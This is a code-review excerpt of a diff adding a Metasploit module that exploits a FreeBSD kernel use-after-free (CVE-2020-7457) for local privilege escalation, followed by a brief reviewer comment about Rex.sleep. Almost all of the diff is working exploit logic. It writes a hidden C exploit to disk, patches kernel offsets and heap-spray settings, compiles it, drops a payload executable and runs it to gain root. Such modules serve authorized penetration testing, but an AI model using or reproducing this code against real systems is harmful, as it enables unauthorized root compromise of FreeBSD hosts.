modules/exploits/freebsd/local/ip6_setpktopt_uaf_priv_esc.rb

```diff
@@ -0,0 +1,251 @@
+    kernel_arch = cmd_exec('uname -m').to_s
+
+    unless kernel_arch.include?('64')
+      return CheckCode::Safe("System architecture #{kernel_arch} is not supported")
+    end
+
+    vprint_good("System architecture #{kernel_arch} is supported")
+
+    unless select_target(kernel_version)
+      return CheckCode::Safe("No target for #{kernel_version}")
+    end
+
+    vprint_good("#{kernel_version} appears vulnerable")
+
+    unless command_exists?('cc')
+      return CheckCode::Safe('cc is not installed')
+    end
+
+    vprint_good('cc is installed')
+
+    CheckCode::Appears
+  end
+
+  def exploit
+    unless check == CheckCode::Appears
+      unless datastore['ForceExploit']
+        fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.')
+      end
+      print_warning('Target does not appear to be vulnerable')
+    end
+
+    if is_root?
+      unless datastore['ForceExploit']
+        fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
+      end
+    end
+
+    unless writable?(base_dir)
+      fail_with(Failure::BadConfig, "#{base_dir} is not writable")
+    end
+
+    if target.name == 'Automatic'
+      kernel_version = cmd_exec('uname -v').to_s
+      my_target = select_target(kernel_version)
+      unless my_target
+        fail_with(Failure::NoTarget, "No target for #{kernel_version}")
+      end
+    else
+      my_target = target
+    end
+
+    exploit_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
+    exploit_data = exploit_data('CVE-2020-7457', 'exploit.c')
+
+    if my_target.name.start_with?('FreeBSD 12')
+      exploit_data.gsub!('// #define FBSD12', '#define FBSD12')
+    end
+
+    exploit_data.gsub!(/#define ALLPROC_OFFSET .*$/, "#define ALLPROC_OFFSET #{my_target[:allproc]}")
+
+    exploit_data.gsub!(/#define NUM_SPRAY 0x100/, "#define NUM_SPRAY #{datastore['NUM_SPRAY']}")
+    exploit_data.gsub!(/#define NUM_KQUEUES 0x100/, "#define NUM_KQUEUES #{datastore['NUM_SPRAY']}")
+    exploit_data.gsub!(/#define NUM_SPRAY_RACE 0x20/, "#define NUM_SPRAY_RACE #{datastore['NUM_SPRAY_RACE']}")
+
+    upload("#{exploit_path}.c", strip_comments(exploit_data))
+
+    vprint_status("Using allproc offset: #{my_target[:allproc]}")
+
+    print_status("Compiling #{exploit_path}.c ...")
+    output = cmd_exec("cc '#{exploit_path}.c' -o '#{exploit_path}' -std=c99 -lpthread")
+    register_file_for_cleanup(exploit_path)
+
+    unless output.blank?
+      print_error(output)
+      fail_with(Failure::Unknown, "#{exploit_path}.c failed to compile")
+    end
+
+    payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
+
+    upload_and_chmodx(payload_path, generate_payload_exe)
+    register_file_for_cleanup(payload_path)
+
+    timeout = 30
+    print_status("Launching exploit (timeout: #{timeout}s) ...")
+    output = cmd_exec(exploit_path, nil, timeout).to_s
+    output.each_line { |line| vprint_status line.chomp }
+
+    Rex.sleep(3)
```

Comment:
I don't think `Rex.sleep` is necessary any more, the regular `sleep` builtin should work just fine.

Reply:
done